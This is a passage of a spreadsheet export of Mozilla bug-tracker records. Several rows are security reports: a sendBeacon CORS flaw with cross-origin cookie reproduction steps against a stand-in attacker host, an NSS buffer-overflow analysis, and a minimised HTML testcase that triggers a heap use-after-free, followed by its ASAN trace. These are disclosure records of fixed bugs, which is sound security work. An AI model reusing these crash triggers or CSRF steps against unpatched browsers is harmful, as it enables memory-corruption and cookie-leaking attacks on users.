      <c r="I5873" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5873" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5873" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5873" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5873" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5873" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5873" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5873" t="inlineStr">
        <is>
          <t>[slavealloc]</t>
        </is>
      </c>
      <c r="Q5873" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5873" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5873" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5873" t="n">
        <v>1</v>
      </c>
      <c r="U5873" t="n">
        <v>0</v>
      </c>
      <c r="V5873" t="n">
        <v>3</v>
      </c>
      <c r="W5873" t="inlineStr">
        <is>
          <t>We use the Notes column in slavealloc to link to bugs and other URLs. Having these be clickable would be super helpful.</t>
        </is>
      </c>
      <c r="X5873" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5874">
      <c r="A5874" t="n">
        <v>1080987</v>
      </c>
      <c r="B5874" t="inlineStr">
        <is>
          <t>2014-10-09 22:02:31 -0700</t>
        </is>
      </c>
      <c r="C5874" t="inlineStr">
        <is>
          <t>navigator.sendBeacon() doesn't satisfy CORS specification</t>
        </is>
      </c>
      <c r="D5874" t="inlineStr">
        <is>
          <t>2024-05-30 08:37:43 -0700</t>
        </is>
      </c>
      <c r="E5874" t="n">
        <v>1</v>
      </c>
      <c r="F5874" t="n">
        <v>1</v>
      </c>
      <c r="G5874" t="n">
        <v>3</v>
      </c>
      <c r="H5874" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5874" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5874" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5874" t="inlineStr">
        <is>
          <t>35 Branch</t>
        </is>
      </c>
      <c r="L5874" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5874" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N5874" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5874" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5874" t="inlineStr">
        <is>
          <t>[reporter-external][adv-main35+][adv-esr31.4+][b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q5874" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5874" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5874" t="inlineStr">
        <is>
          <t>mozilla37</t>
        </is>
      </c>
      <c r="T5874" t="n">
        <v>1</v>
      </c>
      <c r="U5874" t="n">
        <v>0</v>
      </c>
      <c r="V5874" t="n">
        <v>47</v>
      </c>
      <c r="W5874" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Steps to reproduce:
Suppose alice.csrf.jp is a victim and mallory.csrf.jp is the attacker in following scenario.
1) As a preparation, set victim's cookie by accessing following URL.
http://alice.csrf.jp/cookie/set.php?domain=alice.csrf.jp&amp;name=victim&amp;value=secret
2) Launch attacker's page. Then, cross-origin beacon is invoked to the victim, i.e., alice.csrf.jp.
http://mallory.csrf.jp/beacon/
3) Analyze the HTTP request data sent to the victim via navigator.sendBeacon().
Actual results:
Request data sent from navigator.sendBeacon() has no Origin header.
Also, the request data contains victim's cookie automatically.
Expected results:
W3C's Beacon spec, http://www.w3.org/TR/beacon/, says Beacon request needs to be initialized as:
 - force Origin header flag : Set
 - credentials mode : omit.
 So, the request header should contain Origin and should NOT contain Cookie by default.</t>
        </is>
      </c>
      <c r="X5874" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5875">
      <c r="A5875" t="n">
        <v>422926</v>
      </c>
      <c r="B5875" t="inlineStr">
        <is>
          <t>2008-03-14 06:49:57 -0700</t>
        </is>
      </c>
      <c r="C5875" t="inlineStr">
        <is>
          <t>MSNBC Videos won't play</t>
        </is>
      </c>
      <c r="D5875" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E5875" t="n">
        <v>1</v>
      </c>
      <c r="F5875" t="n">
        <v>1</v>
      </c>
      <c r="G5875" t="n">
        <v>6</v>
      </c>
      <c r="H5875" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5875" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5875" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K5875" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5875" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5875" t="inlineStr">
        <is>
          <t>Windows Vista</t>
        </is>
      </c>
      <c r="N5875" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5875" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5875" t="inlineStr"/>
      <c r="Q5875" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5875" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5875" t="inlineStr">
        <is>
          <t>mozilla1.9beta5</t>
        </is>
      </c>
      <c r="T5875" t="n">
        <v>1</v>
      </c>
      <c r="U5875" t="n">
        <v>0</v>
      </c>
      <c r="V5875" t="n">
        <v>22</v>
      </c>
      <c r="W5875" t="inlineStr">
        <is>
          <t>Trying to play videos at www.msnbc.com opens the window but nothing loads or plays. 
MSNBC Works in 200803131647 build - broken in 200803131827 build 
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=MozillaTinderboxAll&amp;branch=HEAD&amp;branchtype=match&amp;dir=&amp;file=&amp;filetype=match&amp;who=&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=2008-03-13+15%3A00%3A00&amp;maxdate=2008-03-13+19%3A00%3A00&amp;cvsroot=%2Fcvsroot
Vista HP</t>
        </is>
      </c>
      <c r="X5875" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5876">
      <c r="A5876" t="n">
        <v>791335</v>
      </c>
      <c r="B5876" t="inlineStr">
        <is>
          <t>2012-09-14 12:42:21 -0700</t>
        </is>
      </c>
      <c r="C5876" t="inlineStr">
        <is>
          <t>Add timeouts to 'make check' and alive tests</t>
        </is>
      </c>
      <c r="D5876" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E5876" t="n">
        <v>1</v>
      </c>
      <c r="F5876" t="n">
        <v>1</v>
      </c>
      <c r="G5876" t="n">
        <v>5</v>
      </c>
      <c r="H5876" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5876" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5876" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5876" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5876" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5876" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5876" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5876" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5876" t="inlineStr">
        <is>
          <t>[buildduty][simple]</t>
        </is>
      </c>
      <c r="Q5876" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5876" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5876" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5876" t="n">
        <v>1</v>
      </c>
      <c r="U5876" t="n">
        <v>0</v>
      </c>
      <c r="V5876" t="n">
        <v>14</v>
      </c>
      <c r="W5876" t="inlineStr">
        <is>
          <t>Ran into some OS X 10.7 64-bit try leak test builds today that were hung for several days.  Not sure why they aren't timing out given that they have a timeout of 1200 seconds configured.</t>
        </is>
      </c>
      <c r="X5876" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5877">
      <c r="A5877" t="n">
        <v>1241034</v>
      </c>
      <c r="B5877" t="inlineStr">
        <is>
          <t>2016-01-19 23:18:25 -0800</t>
        </is>
      </c>
      <c r="C5877" t="inlineStr">
        <is>
          <t>Out-of-bounds write (buffer overflow) in sec_port_ucs2_utf8_conversion_function</t>
        </is>
      </c>
      <c r="D5877" t="inlineStr">
        <is>
          <t>2017-01-05 09:08:15 -0800</t>
        </is>
      </c>
      <c r="E5877" t="n">
        <v>1</v>
      </c>
      <c r="F5877" t="n">
        <v>1</v>
      </c>
      <c r="G5877" t="n">
        <v>3</v>
      </c>
      <c r="H5877" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5877" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J5877" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K5877" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L5877" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5877" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5877" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5877" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5877" t="inlineStr">
        <is>
          <t>[adv-main47+]</t>
        </is>
      </c>
      <c r="Q5877" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5877" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5877" t="inlineStr">
        <is>
          <t>3.23</t>
        </is>
      </c>
      <c r="T5877" t="n">
        <v>1</v>
      </c>
      <c r="U5877" t="n">
        <v>0</v>
      </c>
      <c r="V5877" t="n">
        <v>9</v>
      </c>
      <c r="W5877" t="inlineStr">
        <is>
          <t>Found by visual inspection of the code in bug 1206283 comment #3:
&gt;       if( (inBuf[i+H_0] == 0x00) &amp;&amp; ((inBuf[i+H_0] &amp; 0x80) == 0x00) ) len += 1;
The second H_0 should be H_1; this gives a UTF-8 length of 1 instead of 2 for U+0080 through U+00FF.
The code does two passes over the input UTF-16 string, first to compute the UTF-8 length and then (after comparing with the caller-supplied buffer size) to do the actual conversion without further bounds checks.  This bug is in the first pass and not the second, so it undercomputes the length and potentially overruns the buffer.
(The accompanying tests missed this because they don't cover the case where the buffer is too small, either to verify that conversion fails as expected or that the predicted length returned in that case is correct.)
Depending on how this function is used, it could write past the end of a buffer with arbitrary UTF-8.  Fortunately, uses inside NSS and Gecko (in particular the one that seems to expose this to certificate processing) seem to use worst-case-sized output buffers and wouldn't be affected, but I haven't audited them thoroughly, and this is also exported from libnssutil, so anything linked against it could be affected.</t>
        </is>
      </c>
      <c r="X5877" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5878">
      <c r="A5878" t="n">
        <v>1470260</v>
      </c>
      <c r="B5878" t="inlineStr">
        <is>
          <t>2018-06-21 11:29:53 -0700</t>
        </is>
      </c>
      <c r="C5878" t="inlineStr">
        <is>
          <t>heap-use-after-free in mozilla::RefreshDriverTimer::TickRefreshDrivers</t>
        </is>
      </c>
      <c r="D5878" t="inlineStr">
        <is>
          <t>2024-05-30 09:46:53 -0700</t>
        </is>
      </c>
      <c r="E5878" t="n">
        <v>1</v>
      </c>
      <c r="F5878" t="n">
        <v>1</v>
      </c>
      <c r="G5878" t="n">
        <v>3</v>
      </c>
      <c r="H5878" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5878" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5878" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K5878" t="inlineStr">
        <is>
          <t>60 Branch</t>
        </is>
      </c>
      <c r="L5878" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5878" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5878" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5878" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5878" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main62+][adv-esr60.2+]</t>
        </is>
      </c>
      <c r="Q5878" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5878" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5878" t="inlineStr">
        <is>
          <t>mozilla63</t>
        </is>
      </c>
      <c r="T5878" t="n">
        <v>1</v>
      </c>
      <c r="U5878" t="n">
        <v>0</v>
      </c>
      <c r="V5878" t="n">
        <v>58</v>
      </c>
      <c r="W5878" t="inlineStr">
        <is>
          <t>Created attachment 8986858
crash.html (minimised testcase)
The following testcase crashes the latest ASAN build of Firefox ESR 60 (BuildID=20180621121604). It requires the fuzzPriv extension and requires to be loaded from a HTTP server. I also requires the attached mini.xml in the same directory.
crash.html:
&lt;script&gt;
var xhrp=XMLHttpRequest;
function spin () {
    var x=new xhrp();
    try{x.open("POST","https://mozilla.org",false);}catch(e){}
    try{x.send("X");}catch(e){}
}
function start() {
        o5=document.createElementNS('http://www.w3.org/1999/xhtml','link');
        window.top.setTimeout(fun0, 400);
}
function fun0() {
        o87=this;
        window.top.requestAnimationFrame(fun1);
        o5.href='mini.xml';
}
function fun1() {
        fuzzPriv.trustedKeyEvent(o5,'press',false,false,false,false,13,0);
        spin();
        spin();
        window.fuzzPriv.callDrawWindow(0);
        xhrp=o87.XMLHttpRequest;
        spin();
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==28373==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000059d30 at pc 0x7fac2c8bff34 bp 0x7ffe862054f0 sp 0x7ffe862054e8
READ of size 1 at 0x608000059d30 thread T0 (Web Content)
    #0 0x7fac2c8bff33 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:313:26
    #1 0x7fac2c8bf646 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:333:5
    #2 0x7fac2c8c24fe in RunRefreshDrivers /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:774:5
    #3 0x7fac2c8c24fe in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:687
    #4 0x7fac2c8c2125 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:588:9
    #5 0x7fac2d19016f in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&amp;) /builds/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:68:16
    #6 0x7fac263e7829 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:156:20
    #7 0x7fac262bddde in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1968:28
    #8 0x7fac25ede53e in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2134:25
    #9 0x7fac25edb594 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2064:17
    #10 0x7fac25edccbc in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1910:5
    #11 0x7fac25edd318 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1943:15
    #12 0x7fac2503b1b6 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1040:14
    #13 0x7fac25054970 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:517:10
    #14 0x7fac25ee5ef6 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:125:5
    #15 0x7fac25e38889 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #16 0x7fac25e38889 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #17 0x7fac25e38889 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #18 0x7fac2c16544a in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:157:27
    #19 0x7fac2fa310bb in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:895:22
    #20 0x7fac25e38889 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #21 0x7fac25e38889 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #22 0x7fac25e38889 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #23 0x7fac2fa30aa4 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:721:34
    #24 0x4f6f2c in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:50:30
    #25 0x4f6f2c in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #26 0x7fac4387f82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #27 0x4265bc in _start (/fuzzer3/esr60/firefox/firefox+0x4265bc)
0x608000059d30 is located 16 bytes inside of 88-byte region [0x608000059d20,0x608000059d78)
freed by thread T0 (Web Content) here:
    #0 0x4c6fc2 in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:68:3
    #1 0x7fac2c8bd05a in Shutdown /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1057:3
    #2 0x7fac2c8bd05a in nsRefreshDriver::Disconnect() /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2451
    #3 0x7fac2cac69e6 in nsPresContext::DetachShell() /builds/worker/workspace/build/src/layout/base/nsPresContext.cpp:1112:21
    #4 0x7fac2c91e05a in mozilla::PresShell::Destroy() /builds/worker/workspace/build/src/layout/base/PresShell.cpp:1402:19
    #5 0x7fac2ca2d712 in nsDocumentViewer::DestroyPresShell() /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:4614:15
    #6 0x7fac2ca2e20c in nsDocumentViewer::SetDocumentInternal(nsIDocument*, bool) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1940:5
    #7 0x7fac2bc9def2 in nsXMLContentSink::OnTransformDone(nsresult, nsIDocument*) /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:380:20
    #8 0x7fac2bc9e0af in non-virtual thunk to nsXMLContentSink::OnTransformDone(nsresult, nsIDocument*) /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp
    #9 0x7fac2bd39eaf in txMozillaXSLTProcessor::notifyError() /builds/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1192:16
    #10 0x7fac2bd2518c in txMozillaXSLTProcessor::reportError(nsresult, char16_t const*, char16_t const*) /builds/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1119:9
    #11 0x7fac2bd5e230 in txStylesheetCompiler::cancel(nsresult, char16_t const*, char16_t const*) /builds/worker/workspace/build/src/dom/xslt/xslt/txStylesheetCompiler.cpp:400:20
    #12 0x7fac2bd204e7 in HandleStartElement /builds/worker/workspace/build/src/dom/xslt/xslt/txMozillaStylesheetCompiler.cpp:132:20
    #13 0x7fac2bd204e7 in non-virtual thunk to txStylesheetSink::HandleStartElement(char16_t const*, char16_t const**, unsigned int, unsigned int) /builds/worker/workspace/build/src/dom/xslt/xslt/txMozillaStylesheetCompiler.cpp
    #14 0x7fac26eafb55 in nsExpatDriver::HandleStartElement(char16_t const*, char16_t const**) /builds/worker/workspace/build/src/parser/htmlparser/nsExpatDriver.cpp:324:7
    #15 0x7fac2da544cb in doContent /builds/worker/workspace/build/src/parser/expat/lib/xmlparse.c:2442:11
    #16 0x7fac2da48faa in contentProcessor /builds/worker/workspace/build/src/parser/expat/lib/xmlparse.c:2098:27
    #17 0x7fac2da48faa in doProlog /builds/worker/workspace/build/src/parser/expat/lib/xmlparse.c:4078
    #18 0x7fac2da3f263 in prologProcessor /builds/worker/workspace/build/src/parser/expat/lib/xmlparse.c:3812:10
    #19 0x7fac2da3f263 in prologInitProcessor /builds/worker/workspace/build/src/parser/expat/lib/xmlparse.c:3629
    #20 0x7fac2da3d666 in MOZ_XML_Parse /builds/worker/workspace/build/src/parser/expat/lib/xmlparse.c:1530:17
    #21 0x7fac26eb5add in nsExpatDriver::ParseBuffer(char16_t const*, unsigned int, bool, unsigned int*) /builds/worker/workspace/build/src/parser/htmlparser/nsExpatDriver.cpp:887:16
    #22 0x7fac26eb6def in nsExpatDriver::ConsumeToken(nsScanner&amp;, bool&amp;) /builds/worker/workspace/build/src/parser/htmlparser/nsExpatDriver.cpp:985:5
    #23 0x7fac26ec3259 in nsParser::Tokenize(bool) /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1539:30
    #24 0x7fac26ebf006 in nsParser::ResumeParse(bool, bool, bool) /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1056:41
    #25 0x7fac26ec46a7 in nsParser::OnDataAvailable(nsIRequest*, nsISupports*, nsIInputStream*, unsigned long, unsigned int) /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1437:12
    #26 0x7fac2bd21276 in txStylesheetSink::OnDataAvailable(nsIRequest*, nsISupports*, nsIInputStream*, unsigned long, unsigned int) /builds/worker/workspace/build/src/dom/xslt/xslt/txMozillaStylesheetCompiler.cpp:248:23
    #27 0x7fac25b05172 in nsCORSListenerProxy::OnDataAvailable(nsIRequest*, nsISupports*, nsIInputStream*, unsigned long, unsigned int) /builds/worker/workspace/build/src/netwerk/protocol/http/nsCORSListenerProxy.cpp:668:20
    #28 0x7fac25a8bfa3 in DoOnDataAvailable /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:1040:28
    #29 0x7fac25a8bfa3 in mozilla::net::HttpChannelChild::OnTransportAndData(nsresult const&amp;, nsresult const&amp;, unsigned long const&amp;, unsigned int const&amp;, nsTString&lt;char&gt; const&amp;) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:966
    #30 0x7fac25c93356 in mozilla::net::ChannelEventQueue::FlushQueue() /builds/worker/workspace/build/src/netwerk/ipc/ChannelEventQueue.cpp:93:12
    #31 0x7fac25c9cdbe in MaybeFlushQueue /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:329:5
    #32 0x7fac25c9cdbe in CompleteResume /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:306
    #33 0x7fac25c9cdbe in mozilla::net::ChannelEventQueue::ResumeInternal()::CompleteResumeRunnable::Run() /builds/worker/workspace/build/src/netwerk/ipc/ChannelEventQueue.cpp:161
    #34 0x7fac2501509a in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:413:25
    #35 0x7fac2503b1b6 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1040:14
    #36 0x7fac25054970 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:517:10
previously allocated by thread T0 (Web Content) here:
    #0 0x4c7303 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
    #1 0x4f7dcd in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:70:17
    #2 0x7fac2c8aae96 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:156:12
    #3 0x7fac2c8aae96 in PVsyncActorCreated /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2318
    #4 0x7fac2c8aae96 in CreateContentVsyncRefreshTimer /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1007
    #5 0x7fac2c8aae96 in CreateVsyncRefreshTimer /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1034
    #6 0x7fac2c8aae96 in nsRefreshDriver::ChooseTimer() const /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1142
    #7 0x7fac2c8adaaf in nsRefreshDriver::EnsureTimerStarted(nsRefreshDriver::EnsureTimerStartedFlags) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1378:34
    #8 0x7fac2c8adf6a in nsRefreshDriver::AddRefreshObserver(nsARefreshObserver*, mozilla::FlushType) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1264:3
    #9 0x7fac2b9ec954 in mozilla::dom::CoalescedMouseMoveFlusher::StartObserver() /builds/worker/workspace/build/src/dom/ipc/CoalescedMouseData.cpp:92:23
    #10 0x7fac2b9ec2b5 in mozilla::dom::TabChild::ProcessPendingCoalescedMouseDataAndDispatchEvents() /builds/worker/workspace/build/src/dom/ipc/TabChild.cpp:1563:32
    #11 0x7fac2ba5981d in mozilla::dom::TabChild::RecvRealMouseButtonEvent(mozilla::WidgetMouseEvent const&amp;, mozilla::layers::ScrollableLayerGuid const&amp;, unsigned long const&amp;) /builds/worker/workspace/build/src/dom/ipc/TabChild.cpp:1697:5
    #12 0x7fac2655264e in mozilla::dom::PBrowserChild::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBrowserChild.cpp:3470:20
    #13 0x7fac266975bb in mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PContentChild.cpp:5103:28
    #14 0x7fac25ede53e in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2134:25
    #15 0x7fac25edb594 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2064:17
    #16 0x7fac25edccbc in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1910:5
    #17 0x7fac25edd318 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1943:15
    #18 0x7fac2501509a in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:413:25
    #19 0x7fac2503b1b6 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1040:14
    #20 0x7fac25054970 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:517:10
    #21 0x7fac25ee5f0a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #22 0x7fac25e38889 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #23 0x7fac25e38889 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #24 0x7fac25e38889 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #25 0x7fac2c16544a in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:157:27
    #26 0x7fac2fa310bb in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:895:22
    #27 0x7fac25e38889 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
